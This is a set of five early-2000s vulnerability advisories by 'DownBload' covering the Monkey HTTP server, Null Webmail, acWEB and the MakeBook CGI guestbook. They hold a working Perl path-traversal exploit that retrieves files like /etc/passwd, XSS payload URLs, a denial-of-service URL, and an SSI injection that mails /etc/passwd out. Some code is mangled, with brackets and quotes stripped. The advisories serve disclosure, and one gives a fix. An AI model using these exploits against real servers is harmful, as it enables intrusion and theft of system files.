XSS bug in Monkey (0.5.0) HTTP server
[ Illegal Instruction Labs Advisory ] [-] Advisory name: XSS bug in Monkey (0.5.0) HTTP server Advisory number: 14 Application: Monkey (0.5.0) HTTP server Application author: Eduardo Silva (EdsipeR) Author e-mail: [EMAIL PROTECTED] Monkey Project: http://monkeyd.sourceforge.net Date: 29.09.2002 Impact: XSS code execution Tested on: Debian 2.1 (2.0.36 kernel) Discovered by: DownBload Mail me @: [EMAIL PROTECTED] ==[ Overview Monkey is very simple and fast HTTP server (daemon). ==[ Problems 1.) Monkey is vulnerable to XSS. ---cut here--- www.victim.com/lt;scriptgt;alert('IIL_0wnZ_YoU!!!');lt;/scriptgt; ---cut here--- 2.) There is also XSS bug in test2.pl CGI script (example script) which come with Monkey 0.5.0. ---cut here--- www.victim.com/cgi-bin/test2.pl?lt;scriptgt;alert('IIL_0wnZ_YoU!!!');lt;/scriptgt; ---cut here--- ==[ Greetz Greetz goes to #hr.hackers, #ii-labs and #linux irc.carnet.hr. Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, Fr1c, phreax, StYx, harlequin, LekaMan, Astral and www.active-security.org (NetZero Paradox). I'm very sorry if I forgot someone.
IIL Advisory: Reverse traversal vulnerability in Monkey (0.1.4) HTTP server
[ Illegal Instruction Labs Advisory ] [-] Advisory name: Reverse traversal vulnerability in Monkey (0.1.4) HTTP server Advisory number: 12 Application: Monkey (0.1.4) HTTP server Application author: Eduardo Silva (EdsipeR) Author e-mail: [EMAIL PROTECTED] Monkey Project: http://monkeyd.sourceforge.net Date: 06.09.2002 Impact: Attacker can read files out of SERVER_ROOT directory Tested on: Debian 2.1 (2.0.36 kernel) Discovered by: DownBload Mail me @: [EMAIL PROTECTED] ==[ Overview Monkey is very simple and fast HTTP server (daemon). Monkey supports HEAD GET methods, multiple connections, 100 MIME types. ==[ Problem Monkey doesn't check HTTP request for ../ string, and because of that, attacker can view any file out of SERVER_ROOT directory which Monkey can read (if Monkey is running under root account, attacker can read any file on that machine). There is still one thing which will make attack a little more complicate: - src/method.c ... if((strcmp(aux_request,/))==0 || aux_request[1]=='.' ) { snprintf(filename,255,%s,SERVER_ROOT); } ... Translated to (poor:) english: If our request is / or second char of our request is . , than path will be set to SERVER_ROOT, and in that case, we can't go out of SERVER_ROOT directory. Previous if will prevent simple reverse traversal attack like this one: ---cut here--- GET /../../../../../../../../../etc/passwd HTTP/1.0 ---cut here--- But can't prevent this reverse traversal attack: ---cut here--- GET //../../../../../../../../../etc/passwd HTTP/1.0 ---cut here--- ==[ Exploit ---cut here--- #!/usr/bin/perl # # (0 day;) Monkey-0.1.4 reverse traversal exploit # # Usage: #perl monkey.pl hostname httpport file # #hostname - target host #httpport - port on which HTTP daemon is listening #file - file which you wanna get # # Example: #perl monkey.pl www.ii-labs.org 80 /etc/passwd # # by DownBload [EMAIL PROTECTED] # Illegal Instruction Labs # use IO::Socket; sub sock () { $SOCK = IO::Socket::INET-new (PeerAddr = $host, PeerPort = $port, Proto= tcp) || die [ ERROR: Can't connect to $host!!! ]\n\n; } sub banner() { print [--]\n; print [ Monkey-0.1.4 reverse traversal exploit ]\n; print [by DownBload downbload\@hotmail.com ]\n; print [ Illegal Instruction Labs ]\n; print [--]\n; } if ($#ARGV != 2) { banner(); print [ Usage: ]\n; print [perl monkey.pl hostname httpport file ]\n; print [--]\n; exit(0); } $host = $ARGV[0]; $port = $ARGV[1]; $file = $ARGV[2]; banner(); print [ Connecting to $host... ]\n; sock(); print [ Sending probe... ]\n; print $SOCK HEAD / HTTP/1.0\n\n; while ($a = $SOCK) { $line = $line . $a; } if ($line =~ /Monkey/) { print [ Monkey HTTP server found, continuing... ]\n; } else { die [ SORRY: That's not Monkey HTTP server :( ]\n\n; } close ($SOCK); print [ Connecting to $host... ]\n; sock(); print [ Sending GET request... ]\n; print $SOCK GET //../../../../../../../../../$file HTTP/1.0\n\n; print [ Waiting for response... ]\n\n; while ($line = $SOCK) { print $line; } close ($SOCK); ---cut here--- ==[ Greetz Greetz goes to #hr.hackers, #ii-labs and #linux irc.carnet.hr. Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, Fr1c, phreax, StYx, harlequin, LekaMan, Astral and www.active-security.org (NetZero Paradox). I'm very sorry if I forgot someone.
IIL Advisory: Format String bug in Null Webmail (0.6.3)
[ Illegal Instruction Labs Advisory ] [-] Advisory name: Format String bug in Null Webmail (0.6.3) Advisory number: 7 Application: Null Webmail 0.6.3 Author: Dan Cahill E-mail: [EMAIL PROTECTED] Homepage: http://http://www.nulllogic.com/webmail/ Date: 1.07.2002 Impact: I don't know (yet) Tested on: nowhere Discovered by: DownBload Mail me @: [EMAIL PROTECTED] ==[ Overview Null Webmail is CGI interface to SMTP POP3 server (you can read and send mail with your browser). It is written in C. You can find Null Webmail on sourceforge. ==[ Problem Null Webmail has format string bug in logdata() and wmprintf(), but logdata() is inside /* */, so logdata() isn't interesting to us. Here comes the buggy code: ---[ wmserver.c ... /* void logdata(const char *format, ...) /* --- NOT INTERESTING */ { char logbuffer[1024]; char file[200]; va_list ap; FILE *fp; #ifdef WIN32 snprintf(file, sizeof(file)-1, C:\\webmail.log); #else snprintf(file, sizeof(file)-1, /tmp/webmail.log); #endif fp=fopen(file, a); if (fp!=NULL) { va_start(ap, format); vsnprintf(logbuffer, sizeof(logbuffer)-1, format, ap); va_end(ap); fprintf(fp, %s, logbuffer); fclose(fp); } } */ int wmprintf(const char *format, ...)/* --- INTERESTING FUNCTION */ { char buffer[1024]; va_list ap; va_start(ap, format); vsnprintf(buffer, sizeof(buffer)-1, format, ap); // - INTERESTING va_end(ap); send(wmsocket, buffer, strlen(buffer), 0); // logdata ( %s, buffer); return 0; } ... ---[ call wmprinf() ... wmprintf(USER %s\r\n, wmusername); ... wmprintf(PASS %s\r\n, wmpassword); ... wmprintf(MAIL From: %s\r\n, ptemp); ... wmprintf(RCPT To: %s\r\n, msgaddr); ... wmprintf(From: %s\r\n, wmaddress); wmprintf(To: %s\r\n, msgto); ... wmprintf(Subject: %s\r\n, msgsubject); ... etc. Here we have few wmprintf() calls, and I think that we can put our 'NASTY %sTRING' in all that variables :). ==[ Example Can't test this bug!!! If I'm wrong about this format string bug in Null Webmail, I'm very sorry. ==[ Greetz Greetz goes to #hr.hackers #linux irc.carnet.hr. Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, fi, Sunnis, Fr1c, phreax, harlequin, LekaMan, Astral and www.active-security.org (NetZero Paradox).
IIL Advisory: Vulnerabilities in acWEB HTTP server
[ Illegal Instruction Labs Advisory ] [-] Advisory name: Vulnerabilities in acWEB HTTP server Advisory number: 13 Application: acWEB HTTP server Author e-mail: [EMAIL PROTECTED] Homepage: somewhere on sourceforge Date: 10.09.2002 Impact: DoS, XSS, etc. Tested on: Windows 98 Discovered by: DownBload Mail me @: [EMAIL PROTECTED] ==[ Overview Sourceforge: acWEB is an OpenSource replacement for MS IIS and other proprietary WEB servers for Windows. Unlike IIS, acWEB is not affected by viruses like CodeRed, Nimda, etc :). /ME says: acWEB is simple HTTP server for Windows. It is perfect for tiny companies, and for home use. ==[ Problem(s) ===[ Remote DoS First vulnerability which I discovered in acWEB HTTP server was remote DoS. It is possible to crush acWEB (and Windows too) with simple HTTP request: ---cut here--- http://www.victim.com/com2.bat ---cut here--- ===[ XSS a.k.a CSS bug XSS code execution: ---cut here--- http://www.victim.com/%dblt;scriptgt;alert('Illegal%20Instruction%20Labs% 200wnz%20YoU!!!');lt;/scriptgt;/ ---cut here--- ===[ Fake file download ---cut here--- http://www.victim.com/|%5chacked.txt%00 ---cut here--- When this request it sent to acWEB HTTP server, acWEB will return: --- HTTP/1.0 200 OK Content-Length: 0 Connection: Close Content-Type: application/octet-stream Server: Eserv/3.x --- That is fuqn weird, because file 'hacked.txt' don't exist. acWEB HTTP server will send us 'hacked.txt' empty file to download. ==[ Exploit This can be exploited with browser, so I won't write exploit for this...or maybe one day :). ==[ Greetz Greetz goes to #hr.hackers, #ii-labs and #linux irc.carnet.hr. Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, Fr1c, phreax, LekaMan, StYx, harlequin, Astral and www.active-security.org (NetZero Paradox). I'm very sorry if I forgot someone.
SSI CSS execution in MakeBook 2.2
[ DownBload Security Research Lab Advisory ] [-] Advisory name: SSI CSS execution in MakeBook 2.2 Advisory number: 5 Application: MakeBook 2.2 (CGI script) Application author: Kristina Pfaff-Harris Source: http://www.tesol.net/scriptmail.html Date: 12.6.2002 Impact: remote user can execute shell commands cross site scripting Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4 Discovered by: DownBload Mail me @: [EMAIL PROTECTED] --[ Overview ...MakeBook v2.2 is a simple program which can be used as a guestbook, an ongoing writing project where each person adds to an ongoing story, a comment board, or even a way to let people add comments to many individual pages. It allows a user to enter their name, email address, and some text which will then be added to the bookfile. Originally intended for use in writing a continuing story or journal, where different students could add to the story as they went along, it has evolved into a more flexible system which allows the owner to choose how the book entries should appear, and even what pages they appear on... --[ Problem Our dear Kristina wrote an advanced CGI guestbook, in perl ofcorse. It works fine, but troubles comes when you look for security measures in program. When you want to sign guestbook, you have to write your name, email address, and some text. Script does remove 'some' special-char in $text, but script doesn't replace special-chars in $name at all, and because of that, it is possible instead of name, enter and execute some SSI(Server Side Includes) or CSS(Cross Site Scripting) code. 'Buggy' code: ... $name =$data{Name}; $email =$data{Email}; $text =$data{Text}; $text =~ s//lt;/g; $text =~ s//gt;/g; ... --[ Examples SSI attack ~~ Name: !--#exec cmd=/bin/mail [EMAIL PROTECTED] /etc/passwd-- E-mail: [EMAIL PROTECTED] Text: I hacked you, my kung-fu is the best... ;) CSS attack ~~ Name: img src=javascript:alert('HACKED BY DOWNBLOAD'); E-mail: [EMAIL PROTECTED] Text: I hacked you, my kung-fu is the best... ;) I won't give you more examples, use your own imagination :). BTW: SSI attack depends on web server, because some web servers comes with, and some without support for SSI. --[ Solution Solution for this bug would be to filter special characters from user input. For now, you can use this: ... $name = $data{Name}; $name =~ s//lt;/g; $name =~ s//gt;/g; $email = $data{Email}; $email =~ s//lt;/g; $email =~ s//gt;/g; $text = $data{Text}; $text =~ s//lt;/g; $text =~ s//gt;/g; ... --[ Greetz Greetz goes to #hr.hackers irc.carnet.hr. Special greetz goes to Kristina Pfaff-Harris (ladies first), BoyScout, h4z4rd, fi, Fr1c, harlequin and www.active-security.org.